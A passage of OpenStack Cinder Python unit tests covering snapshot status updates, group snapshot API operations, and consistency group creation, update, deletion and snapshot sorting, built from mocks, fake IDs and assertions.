webob.Request.blank('/v2/%s/snapshots/%s/action' % ( fake.PROJECT_ID, fake.SNAPSHOT_ID)) req.method = "POST" req.body = jsonutils.dump_as_bytes(body) req.headers["content-type"] = "application/json" res = req.get_response(fakes.wsgi_app( fake_auth_context=self.user_ctxt)) self.assertEqual(400, res.status_int) def test_update_snapshot_status_without_status(self): self.mock_object(db, 'snapshot_get', fake_snapshot_get) body = {'os-update_snapshot_status': {}} req = webob.Request.blank('/v2/%s/snapshots/%s/action' % ( fake.PROJECT_ID, fake.SNAPSHOT_ID)) req.method = "POST" req.body = jsonutils.dump_as_bytes(body) req.headers["content-type"] = "application/json" res = req.get_response(fakes.wsgi_app( fake_auth_context=self.user_ctxt)) self.assertEqual(400, res.status_int) ``` #### File: api/v3/test_group_snapshots.py ```python import ddt import mock import webob from cinder.api.v3 import group_snapshots as v3_group_snapshots from cinder import context from cinder import db from cinder import exception from cinder.group import api as group_api from cinder import objects from cinder.objects import fields from cinder import test from cinder.tests.unit.api import fakes from cinder.tests.unit import fake_constants as fake from cinder.tests.unit import utils import cinder.volume GROUP_MICRO_VERSION = '3.14' @ddt.ddt class GroupSnapshotsAPITestCase(test.TestCase): """Test Case for group_snapshots API.""" def setUp(self): super(GroupSnapshotsAPITestCase, self).setUp() self.controller = v3_group_snapshots.GroupSnapshotsController() self.volume_api = cinder.volume.API() self.context = context.get_admin_context() self.context.project_id = fake.PROJECT_ID self.context.user_id = fake.USER_ID self.user_ctxt = context.RequestContext( fake.USER_ID, fake.PROJECT_ID, auth_token=True) def test_show_group_snapshot(self): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] group_snapshot = utils.create_group_snapshot( self.context, group_id=group.id) req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' % (fake.PROJECT_ID, group_snapshot.id), version=GROUP_MICRO_VERSION) res_dict = self.controller.show(req, group_snapshot.id) self.assertEqual(1, len(res_dict)) self.assertEqual('this is a test group snapshot', res_dict['group_snapshot']['description']) self.assertEqual('test_group_snapshot', res_dict['group_snapshot']['name']) self.assertEqual('creating', res_dict['group_snapshot']['status']) group_snapshot.destroy() db.volume_destroy(context.get_admin_context(), volume_id) group.destroy() def test_show_group_snapshot_with_group_snapshot_NotFound(self): req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' % (fake.PROJECT_ID, fake.WILL_NOT_BE_FOUND_ID), version=GROUP_MICRO_VERSION) self.assertRaises(exception.GroupSnapshotNotFound, self.controller.show, req, fake.WILL_NOT_BE_FOUND_ID) def test_list_group_snapshots_json(self): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] group_snapshot1 = utils.create_group_snapshot( self.context, group_id=group.id, group_type_id=group.group_type_id) group_snapshot2 = utils.create_group_snapshot( self.context, group_id=group.id, group_type_id=group.group_type_id) group_snapshot3 = utils.create_group_snapshot( self.context, group_id=group.id, group_type_id=group.group_type_id) req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' % fake.PROJECT_ID, version=GROUP_MICRO_VERSION) res_dict = self.controller.index(req) self.assertEqual(1, len(res_dict)) self.assertEqual(group_snapshot1.id, res_dict['group_snapshots'][0]['id']) self.assertEqual('test_group_snapshot', res_dict['group_snapshots'][0]['name']) self.assertEqual(group_snapshot2.id, res_dict['group_snapshots'][1]['id']) self.assertEqual('test_group_snapshot', res_dict['group_snapshots'][1]['name']) self.assertEqual(group_snapshot3.id, res_dict['group_snapshots'][2]['id']) self.assertEqual('test_group_snapshot', res_dict['group_snapshots'][2]['name']) group_snapshot3.destroy() group_snapshot2.destroy() group_snapshot1.destroy() db.volume_destroy(context.get_admin_context(), volume_id) group.destroy() def test_list_group_snapshots_detail_json(self): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] group_snapshot1 = utils.create_group_snapshot( self.context, group_id=group.id) group_snapshot2 = utils.create_group_snapshot( self.context, group_id=group.id) group_snapshot3 = utils.create_group_snapshot( self.context, group_id=group.id) req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/detail' % fake.PROJECT_ID, version=GROUP_MICRO_VERSION) res_dict = self.controller.detail(req) self.assertEqual(1, len(res_dict)) self.assertEqual(3, len(res_dict['group_snapshots'])) self.assertEqual('this is a test group snapshot', res_dict['group_snapshots'][0]['description']) self.assertEqual('test_group_snapshot', res_dict['group_snapshots'][0]['name']) self.assertEqual(group_snapshot1.id, res_dict['group_snapshots'][0]['id']) self.assertEqual('creating', res_dict['group_snapshots'][0]['status']) self.assertEqual('this is a test group snapshot', res_dict['group_snapshots'][1]['description']) self.assertEqual('test_group_snapshot', res_dict['group_snapshots'][1]['name']) self.assertEqual(group_snapshot2.id, res_dict['group_snapshots'][1]['id']) self.assertEqual('creating', res_dict['group_snapshots'][1]['status']) self.assertEqual('this is a test group snapshot', res_dict['group_snapshots'][2]['description']) self.assertEqual('test_group_snapshot', res_dict['group_snapshots'][2]['name']) self.assertEqual(group_snapshot3.id, res_dict['group_snapshots'][2]['id']) self.assertEqual('creating', res_dict['group_snapshots'][2]['status']) group_snapshot3.destroy() group_snapshot2.destroy() group_snapshot1.destroy() db.volume_destroy(context.get_admin_context(), volume_id) group.destroy() @mock.patch( 'cinder.api.openstack.wsgi.Controller.validate_name_and_description') @mock.patch('cinder.db.volume_type_get') @mock.patch('cinder.quota.VolumeTypeQuotaEngine.reserve') def test_create_group_snapshot_json(self, mock_quota, mock_vol_type, mock_validate): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] body = {"group_snapshot": {"name": "group_snapshot1", "description": "Group Snapshot 1", "group_id": group.id}} req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' % fake.PROJECT_ID, version=GROUP_MICRO_VERSION) res_dict = self.controller.create(req, body) self.assertEqual(1, len(res_dict)) self.assertIn('id', res_dict['group_snapshot']) self.assertTrue(mock_validate.called) group.destroy() group_snapshot = objects.GroupSnapshot.get_by_id( context.get_admin_context(), res_dict['group_snapshot']['id']) db.volume_destroy(context.get_admin_context(), volume_id) group_snapshot.destroy() @mock.patch( 'cinder.api.openstack.wsgi.Controller.validate_name_and_description') @mock.patch('cinder.db.volume_type_get') def test_create_group_snapshot_when_volume_in_error_status( self, mock_vol_type, mock_validate): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, status='error', group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] body = {"group_snapshot": {"name": "group_snapshot1", "description": "Group Snapshot 1", "group_id": group.id}} req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' % fake.PROJECT_ID, version=GROUP_MICRO_VERSION) self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create, req, body) self.assertTrue(mock_validate.called) group.destroy() db.volume_destroy(context.get_admin_context(), volume_id) def test_create_group_snapshot_with_no_body(self): # omit body from the request req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' % fake.PROJECT_ID, version=GROUP_MICRO_VERSION) self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create, req, None) @mock.patch.object(group_api.API, 'create_group_snapshot', side_effect=exception.InvalidGroupSnapshot( reason='Invalid group snapshot')) def test_create_with_invalid_group_snapshot(self, mock_create_group_snap): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, status='error', group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] body = {"group_snapshot": {"name": "group_snapshot1", "description": "Group Snapshot 1", "group_id": group.id}} req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' % fake.PROJECT_ID, version=GROUP_MICRO_VERSION) self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create, req, body) group.destroy() db.volume_destroy(context.get_admin_context(), volume_id) @mock.patch.object(group_api.API, 'create_group_snapshot', side_effect=exception.GroupSnapshotNotFound( group_snapshot_id='invalid_id')) def test_create_with_group_snapshot_not_found(self, mock_create_grp_snap): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, status='error', group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] body = {"group_snapshot": {"name": "group_snapshot1", "description": "Group Snapshot 1", "group_id": group.id}} req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' % fake.PROJECT_ID, version=GROUP_MICRO_VERSION) self.assertRaises(exception.GroupSnapshotNotFound, self.controller.create, req, body) group.destroy() db.volume_destroy(context.get_admin_context(), volume_id) def test_create_group_snapshot_from_empty_group(self): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) body = {"group_snapshot": {"name": "group_snapshot1", "description": "Group Snapshot 1", "group_id": group.id}} req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' % fake.PROJECT_ID, version=GROUP_MICRO_VERSION) self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create, req, body) group.destroy() def test_delete_group_snapshot_available(self): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] group_snapshot = utils.create_group_snapshot( self.context, group_id=group.id, status='available') req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' % (fake.PROJECT_ID, group_snapshot.id), version=GROUP_MICRO_VERSION) res_dict = self.controller.delete(req, group_snapshot.id) group_snapshot = objects.GroupSnapshot.get_by_id(self.context, group_snapshot.id) self.assertEqual(202, res_dict.status_int) self.assertEqual('deleting', group_snapshot.status) group_snapshot.destroy() db.volume_destroy(context.get_admin_context(), volume_id) group.destroy() def test_delete_group_snapshot_available_used_as_source(self): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] group_snapshot = utils.create_group_snapshot( self.context, group_id=group.id, status='available') group2 = utils.create_group( self.context, status='creating', group_snapshot_id=group_snapshot.id, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' % (fake.PROJECT_ID, group_snapshot.id), version=GROUP_MICRO_VERSION) self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete, req, group_snapshot.id) group_snapshot.destroy() db.volume_destroy(context.get_admin_context(), volume_id) group.destroy() group2.destroy() def test_delete_group_snapshot_with_group_snapshot_NotFound(self): req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' % (fake.PROJECT_ID, fake.WILL_NOT_BE_FOUND_ID), version=GROUP_MICRO_VERSION) self.assertRaises(exception.GroupSnapshotNotFound, self.controller.delete, req, fake.WILL_NOT_BE_FOUND_ID) def test_delete_group_snapshot_with_invalid_group_snapshot(self): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID],) volume_id = utils.create_volume( self.context, group_id=group.id, volume_type_id=fake.VOLUME_TYPE_ID)['id'] group_snapshot = utils.create_group_snapshot( self.context, group_id=group.id, status='invalid') req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' % (fake.PROJECT_ID, group_snapshot.id), version=GROUP_MICRO_VERSION) self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete, req, group_snapshot.id) group_snapshot.destroy() db.volume_destroy(context.get_admin_context(), volume_id) group.destroy() @ddt.data(('3.11', 'fake_snapshot_001', fields.GroupSnapshotStatus.AVAILABLE, exception.VersionNotFoundForAPIMethod), ('3.18', 'fake_snapshot_001', fields.GroupSnapshotStatus.AVAILABLE, exception.VersionNotFoundForAPIMethod), ('3.19', 'fake_snapshot_001', fields.GroupSnapshotStatus.AVAILABLE, exception.GroupSnapshotNotFound)) @ddt.unpack def test_reset_group_snapshot_status_illegal(self, version, group_snapshot_id, status, exceptions): req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s/action' % (fake.PROJECT_ID, group_snapshot_id), version=version) body = {"reset_status": { "status": status }} self.assertRaises(exceptions, self.controller.reset_status, req, group_snapshot_id, body) def test_reset_group_snapshot_status_invalid_status(self): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID]) group_snapshot = utils.create_group_snapshot( self.context, group_id=group.id, status=fields.GroupSnapshotStatus.CREATING) req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s/action' % (fake.PROJECT_ID, group_snapshot.id), version='3.19') body = {"reset_status": { "status": "invalid_test_status" }} self.assertRaises(webob.exc.HTTPBadRequest, self.controller.reset_status, req, group_snapshot.id, body) def test_reset_group_snapshot_status(self): group = utils.create_group( self.context, group_type_id=fake.GROUP_TYPE_ID, volume_type_ids=[fake.VOLUME_TYPE_ID]) group_snapshot = utils.create_group_snapshot( self.context, group_id=group.id, status=fields.GroupSnapshotStatus.CREATING) req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s/action' % (fake.PROJECT_ID, group_snapshot.id), version='3.19') body = {"reset_status": { "status": fields.GroupSnapshotStatus.AVAILABLE }} response = self.controller.reset_status(req, group_snapshot.id, body) g_snapshot = objects.GroupSnapshot.get_by_id(self.context, group_snapshot.id) self.assertEqual(202, response.status_int) self.assertEqual(fields.GroupSnapshotStatus.AVAILABLE, g_snapshot.status) ``` #### File: unit/consistencygroup/test_cg.py ```python import ddt import mock from oslo_config import cfg import cinder.consistencygroup from cinder import context from cinder import db from cinder import exception from cinder import objects from cinder.objects import fields from cinder import quota from cinder.tests.unit import conf_fixture from cinder.tests.unit import fake_constants as fake from cinder.tests.unit import fake_snapshot from cinder.tests.unit import fake_volume from cinder.tests.unit import utils as tests_utils from cinder.tests.unit import volume as base import cinder.volume from cinder.volume import driver from cinder.volume import utils as volutils CGQUOTAS = quota.CGQUOTAS CONF = cfg.CONF @ddt.ddt class ConsistencyGroupTestCase(base.BaseVolumeTestCase): def test_delete_volume_in_consistency_group(self): """Test deleting a volume that's tied to a consistency group fails.""" consistencygroup_id = fake.CONSISTENCY_GROUP_ID volume_api = cinder.volume.api.API() self.volume_params.update({'status': 'available', 'consistencygroup_id': consistencygroup_id}) volume = tests_utils.create_volume(self.context, **self.volume_params) self.assertRaises(exception.InvalidVolume, volume_api.delete, self.context, volume) @mock.patch.object(CGQUOTAS, "reserve", return_value=["RESERVATION"]) @mock.patch.object(CGQUOTAS, "commit") @mock.patch.object(CGQUOTAS, "rollback") @mock.patch.object(driver.VolumeDriver, "delete_consistencygroup", return_value=({'status': ( fields.ConsistencyGroupStatus.DELETED)}, [])) def test_create_delete_consistencygroup(self, fake_delete_cg, fake_rollback, fake_commit, fake_reserve): """Test consistencygroup can be created and deleted.""" def fake_driver_create_cg(context, group): """Make sure that the pool is part of the host.""" self.assertIn('host', group) host = group.host pool = volutils.extract_host(host, level='pool') self.assertEqual('fakepool', pool) return {'status': 'available'} self.mock_object(self.volume.driver, 'create_consistencygroup', fake_driver_create_cg) group = tests_utils.create_consistencygroup( self.context, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2', host='fakehost@fakedrv#fakepool') group = objects.ConsistencyGroup.get_by_id(self.context, group.id) self.assertEqual(0, len(self.notifier.notifications), self.notifier.notifications) self.volume.create_consistencygroup(self.context, group) self.assertEqual(2, len(self.notifier.notifications), self.notifier.notifications) msg = self.notifier.notifications[0] self.assertEqual('consistencygroup.create.start', msg['event_type']) expected = { 'status': fields.ConsistencyGroupStatus.AVAILABLE, 'name': 'test_cg', 'availability_zone': 'nova', 'tenant_id': self.context.project_id, 'created_at': mock.ANY, 'user_id': fake.USER_ID, 'consistencygroup_id': group.id } self.assertDictEqual(expected, msg['payload']) msg = self.notifier.notifications[1] self.assertEqual('consistencygroup.create.end', msg['event_type']) self.assertDictEqual(expected, msg['payload']) self.assertEqual( group.id, objects.ConsistencyGroup.get_by_id(context.get_admin_context(), group.id).id) self.volume.delete_consistencygroup(self.context, group) cg = objects.ConsistencyGroup.get_by_id( context.get_admin_context(read_deleted='yes'), group.id) self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg.status) self.assertEqual(4, len(self.notifier.notifications), self.notifier.notifications) msg = self.notifier.notifications[2] self.assertEqual('consistencygroup.delete.start', msg['event_type']) self.assertDictEqual(expected, msg['payload']) msg = self.notifier.notifications[3] self.assertEqual('consistencygroup.delete.end', msg['event_type']) expected['status'] = fields.ConsistencyGroupStatus.DELETED self.assertDictEqual(expected, msg['payload']) self.assertRaises(exception.NotFound, objects.ConsistencyGroup.get_by_id, self.context, group.id) @mock.patch.object(CGQUOTAS, "reserve", return_value=["RESERVATION"]) @mock.patch.object(CGQUOTAS, "commit") @mock.patch.object(CGQUOTAS, "rollback") @mock.patch.object(driver.VolumeDriver, "create_consistencygroup", return_value={'status': 'available'}) @mock.patch.object(driver.VolumeDriver, "update_consistencygroup") def test_update_consistencygroup(self, fake_update_cg, fake_create_cg, fake_rollback, fake_commit, fake_reserve): """Test consistencygroup can be updated.""" group = tests_utils.create_consistencygroup( self.context, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2') self.volume.create_consistencygroup(self.context, group) volume = tests_utils.create_volume( self.context, consistencygroup_id=group.id, **self.volume_params) self.volume.create_volume(self.context, volume) volume2 = tests_utils.create_volume( self.context, consistencygroup_id=None, **self.volume_params) self.volume.create_volume(self.context, volume2) fake_update_cg.return_value = ( {'status': fields.ConsistencyGroupStatus.AVAILABLE}, [{'id': volume2.id, 'status': 'available'}], [{'id': volume.id, 'status': 'available'}]) self.volume.update_consistencygroup(self.context, group, add_volumes=volume2.id, remove_volumes=volume.id) cg = objects.ConsistencyGroup.get_by_id(self.context, group.id) expected = { 'status': fields.ConsistencyGroupStatus.AVAILABLE, 'name': 'test_cg', 'availability_zone': 'nova', 'tenant_id': self.context.project_id, 'created_at': mock.ANY, 'user_id': fake.USER_ID, 'consistencygroup_id': group.id } self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg.status) self.assertEqual(10, len(self.notifier.notifications), self.notifier.notifications) msg = self.notifier.notifications[6] self.assertEqual('consistencygroup.update.start', msg['event_type']) self.assertDictEqual(expected, msg['payload']) msg = self.notifier.notifications[8] self.assertEqual('consistencygroup.update.end', msg['event_type']) self.assertDictEqual(expected, msg['payload']) cgvolumes = db.volume_get_all_by_group(self.context, group.id) cgvol_ids = [cgvol['id'] for cgvol in cgvolumes] # Verify volume is removed. self.assertNotIn(volume.id, cgvol_ids) # Verify volume is added. self.assertIn(volume2.id, cgvol_ids) self.volume_params['status'] = 'wrong-status' volume3 = tests_utils.create_volume( self.context, consistencygroup_id=None, **self.volume_params) volume_id3 = volume3['id'] volume_get_orig = self.volume.db.volume_get self.volume.db.volume_get = mock.Mock( return_value={'status': 'wrong_status', 'id': volume_id3}) # Try to add a volume in wrong status self.assertRaises(exception.InvalidVolume, self.volume.update_consistencygroup, self.context, group, add_volumes=volume_id3, remove_volumes=None) self.volume.db.volume_get.reset_mock() self.volume.db.volume_get = volume_get_orig def test_update_consistencygroup_volume_not_found(self): group = tests_utils.create_consistencygroup( self.context, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2') self.assertRaises(exception.VolumeNotFound, self.volume.update_consistencygroup, self.context, group, fake.VOLUME_ID) self.assertRaises(exception.VolumeNotFound, self.volume.update_consistencygroup, self.context, group, None, fake.VOLUME_ID) @mock.patch.object(driver.VolumeDriver, "create_consistencygroup", return_value={'status': 'available'}) @mock.patch.object(driver.VolumeDriver, "delete_consistencygroup", return_value=({'status': 'deleted'}, [])) @mock.patch.object(driver.VolumeDriver, "create_cgsnapshot", return_value={'status': 'available'}) @mock.patch.object(driver.VolumeDriver, "delete_cgsnapshot", return_value=({'status': 'deleted'}, [])) @mock.patch.object(driver.VolumeDriver, "create_consistencygroup_from_src", return_value=(None, None)) @mock.patch('cinder.volume.drivers.lvm.LVMVolumeDriver.' 'create_volume_from_snapshot') @mock.patch('cinder.volume.drivers.lvm.LVMVolumeDriver.' 'create_cloned_volume') def test_create_consistencygroup_from_src(self, mock_create_cloned_vol, mock_create_vol_from_snap, mock_create_from_src, mock_delete_cgsnap, mock_create_cgsnap, mock_delete_cg, mock_create_cg): """Test consistencygroup can be created and deleted.""" group = tests_utils.create_consistencygroup( self.context, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2', status=fields.ConsistencyGroupStatus.AVAILABLE) volume = tests_utils.create_volume( self.context, consistencygroup_id=group.id, status='available', host=CONF.host, size=1) volume_id = volume['id'] cgsnapshot_returns = self._create_cgsnapshot(group.id, [volume_id]) cgsnapshot = cgsnapshot_returns[0] snapshot_id = cgsnapshot_returns[1][0]['id'] # Create CG from source CG snapshot. group2 = tests_utils.create_consistencygroup( self.context, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2', cgsnapshot_id=cgsnapshot.id) group2 = objects.ConsistencyGroup.get_by_id(self.context, group2.id) volume2 = tests_utils.create_volume( self.context, consistencygroup_id=group2.id, snapshot_id=snapshot_id, **self.volume_params) self.volume.create_volume(self.context, volume2) self.volume.create_consistencygroup_from_src( self.context, group2, cgsnapshot=cgsnapshot) cg2 = objects.ConsistencyGroup.get_by_id(self.context, group2.id) expected = { 'status': fields.ConsistencyGroupStatus.AVAILABLE, 'name': 'test_cg', 'availability_zone': 'nova', 'tenant_id': self.context.project_id, 'created_at': mock.ANY, 'user_id': fake.USER_ID, 'consistencygroup_id': group2.id, } self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg2.status) self.assertEqual(group2.id, cg2['id']) self.assertEqual(cgsnapshot.id, cg2['cgsnapshot_id']) self.assertIsNone(cg2['source_cgid']) msg = self.notifier.notifications[2] self.assertEqual('consistencygroup.create.start', msg['event_type']) self.assertDictEqual(expected, msg['payload']) msg = self.notifier.notifications[4] self.assertEqual('consistencygroup.create.end', msg['event_type']) self.assertDictEqual(expected, msg['payload']) if len(self.notifier.notifications) > 6: self.assertFalse(self.notifier.notifications[6], self.notifier.notifications) self.assertEqual(6, len(self.notifier.notifications), self.notifier.notifications) self.volume.delete_consistencygroup(self.context, group2) if len(self.notifier.notifications) > 10: self.assertFalse(self.notifier.notifications[10], self.notifier.notifications) self.assertEqual(10, len(self.notifier.notifications), self.notifier.notifications) msg = self.notifier.notifications[6] self.assertEqual('consistencygroup.delete.start', msg['event_type']) expected['status'] = fields.ConsistencyGroupStatus.AVAILABLE self.assertDictEqual(expected, msg['payload']) msg = self.notifier.notifications[8] self.assertEqual('consistencygroup.delete.end', msg['event_type']) expected['status'] = fields.ConsistencyGroupStatus.DELETED self.assertDictEqual(expected, msg['payload']) cg2 = objects.ConsistencyGroup.get_by_id( context.get_admin_context(read_deleted='yes'), group2.id) self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg2.status) self.assertRaises(exception.NotFound, objects.ConsistencyGroup.get_by_id, self.context, group2.id) # Create CG from source CG. group3 = tests_utils.create_consistencygroup( self.context, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2', source_cgid=group.id) volume3 = tests_utils.create_volume( self.context, consistencygroup_id=group3.id, source_volid=volume_id, **self.volume_params) self.volume.create_volume(self.context, volume3) self.volume.create_consistencygroup_from_src( self.context, group3, source_cg=group) cg3 = objects.ConsistencyGroup.get_by_id(self.context, group3.id) self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg3.status) self.assertEqual(group3.id, cg3.id) self.assertEqual(group.id, cg3.source_cgid) self.assertIsNone(cg3.cgsnapshot_id) self.volume.delete_cgsnapshot(self.context, cgsnapshot) self.volume.delete_consistencygroup(self.context, group) def test_create_consistencygroup_from_src_frozen(self): service = tests_utils.create_service(self.context, {'frozen': True}) cg = tests_utils.create_consistencygroup(self.context, host=service.host) cg_api = cinder.consistencygroup.api.API() self.assertRaises(exception.InvalidInput, cg_api.create_from_src, self.context, 'cg', 'desc', cgsnapshot_id=None, source_cgid=cg.id) def test_delete_consistencygroup_frozen(self): service = tests_utils.create_service(self.context, {'frozen': True}) cg = tests_utils.create_consistencygroup(self.context, host=service.host) cg_api = cinder.consistencygroup.api.API() self.assertRaises(exception.InvalidInput, cg_api.delete, self.context, cg) def test_create_cgsnapshot_frozen(self): service = tests_utils.create_service(self.context, {'frozen': True}) cg = tests_utils.create_consistencygroup(self.context, host=service.host) cg_api = cinder.consistencygroup.api.API() self.assertRaises(exception.InvalidInput, cg_api.create_cgsnapshot, self.context, cg, 'cg', 'desc') def test_delete_cgsnapshot_frozen(self): service = tests_utils.create_service(self.context, {'frozen': True}) cg = tests_utils.create_consistencygroup(self.context, host=service.host) cgsnap = tests_utils.create_cgsnapshot(self.context, cg.id) cg_api = cinder.consistencygroup.api.API() self.assertRaises(exception.InvalidInput, cg_api.delete_cgsnapshot, self.context, cgsnap) def test_sort_snapshots(self): vol1 = {'id': fake.VOLUME_ID, 'name': 'volume 1', 'snapshot_id': fake.SNAPSHOT_ID, 'consistencygroup_id': fake.CONSISTENCY_GROUP_ID} vol2 = {'id': fake.VOLUME2_ID, 'name': 'volume 2', 'snapshot_id': fake.SNAPSHOT2_ID, 'consistencygroup_id': fake.CONSISTENCY_GROUP_ID} vol3 = {'id': fake.VOLUME3_ID, 'name': 'volume 3', 'snapshot_id': fake.SNAPSHOT3_ID, 'consistencygroup_id': fake.CONSISTENCY_GROUP_ID} snp1 = {'id': fake.SNAPSHOT_ID, 'name': 'snap 1', 'cgsnapshot_id': fake.CONSISTENCY_GROUP_ID} snp2 = {'id': fake.SNAPSHOT2_ID, 'name': 'snap 2', 'cgsnapshot_id': fake.CONSISTENCY_GROUP_ID} snp3 = {'id': fake.SNAPSHOT3_ID, 'name': 'snap 3', 'cgsnapshot_id': fake.CONSISTENCY_GROUP_ID} snp1_obj = fake_snapshot.fake_snapshot_obj(self.context, **snp1) snp2_obj = fake_snapshot.fake_snapshot_obj(self.context, **snp2) snp3_obj = fake_snapshot.fake_snapshot_obj(self.context, **snp3) volumes = [] snapshots = [] volumes.append(vol1) volumes.append(vol2) volumes.append(vol3) snapshots.append(snp2_obj) snapshots.append(snp3_obj) snapshots.append(snp1_obj) i = 0 for vol in volumes: snap = snapshots[i] i += 1 self.assertNotEqual(vol['snapshot_id'], snap.id) sorted_snaps = self.volume._sort_snapshots(volumes, snapshots) i = 0 for vol in volumes: snap = sorted_snaps[i] i += 1 self.assertEqual(vol['snapshot_id'], snap.id) snapshots[2]['id'] = fake.WILL_NOT_BE_FOUND_ID self.assertRaises(exception.SnapshotNotFound, self.volume._sort_snapshots, volumes, snapshots) self.assertRaises(exception.InvalidInput, self.volume._sort_snapshots, volumes, []) def test_sort_source_vols(self): vol1 = {'id': '1', 'name': 'volume 1', 'source_volid': '1', 'consistencygroup_id': '2'} vol2 = {'id': '2', 'name': 'volume 2', 'source_volid': '2', 'consistencygroup_id': '2'} vol3 = {'id': '3', 'name': 'volume 3', 'source_volid': '3', 'consistencygroup_id': '2'} src_vol1 = {'id': '1', 'name': 'source vol 1', 'consistencygroup_id': '1'} src_vol2 = {'id': '2', 'name': 'source vol 2', 'consistencygroup_id': '1'} src_vol3 = {'id': '3', 'name': 'source vol 3', 'consistencygroup_id': '1'} volumes = [] src_vols = [] volumes.append(vol1) volumes.append(vol2) volumes.append(vol3) src_vols.append(src_vol2) src_vols.append(src_vol3) src_vols.append(src_vol1) i = 0 for vol in volumes: src_vol = src_vols[i] i += 1 self.assertNotEqual(vol['source_volid'], src_vol['id']) sorted_src_vols = self.volume._sort_source_vols(volumes, src_vols) i = 0 for vol in volumes: src_vol = sorted_src_vols[i] i += 1 self.assertEqual(vol['source_volid'], src_vol['id']) src_vols[2]['id'] = '9999' self.assertRaises(exception.VolumeNotFound, self.volume._sort_source_vols, volumes, src_vols) self.assertRaises(exception.InvalidInput, self.volume._sort_source_vols, volumes, []) def _create_cgsnapshot(self, group_id, volume_ids, size='0'): """Create a cgsnapshot object.""" cgsnap = objects.CGSnapshot(self.context) cgsnap.user_id = fake.USER_ID cgsnap.project_id = fake.PROJECT_ID cgsnap.consistencygroup_id = group_id cgsnap.status = "creating" cgsnap.create() # Create snapshot list for volume_id in volume_ids: snaps = [] snap = objects.Snapshot(context.get_admin_context()) snap.volume_size = size snap.user_id = fake.USER_ID snap.project_id = fake.PROJECT_ID snap.volume_id = volume_id snap.status = "available" snap.cgsnapshot_id = cgsnap.id snap.create() snaps.append(snap) return cgsnap, snaps @ddt.data((CONF.host, None), (CONF.host + 'fake', 'mycluster')) @ddt.unpack @mock.patch('cinder.tests.unit.fake_notifier.FakeNotifier._notify') @mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup', autospec=True, return_value={'status': 'available'}) @mock.patch('cinder.volume.driver.VolumeDriver.delete_consistencygroup', autospec=True, return_value=({'status': 'deleted'}, [])) @mock.patch('cinder.volume.driver.VolumeDriver.create_cgsnapshot', 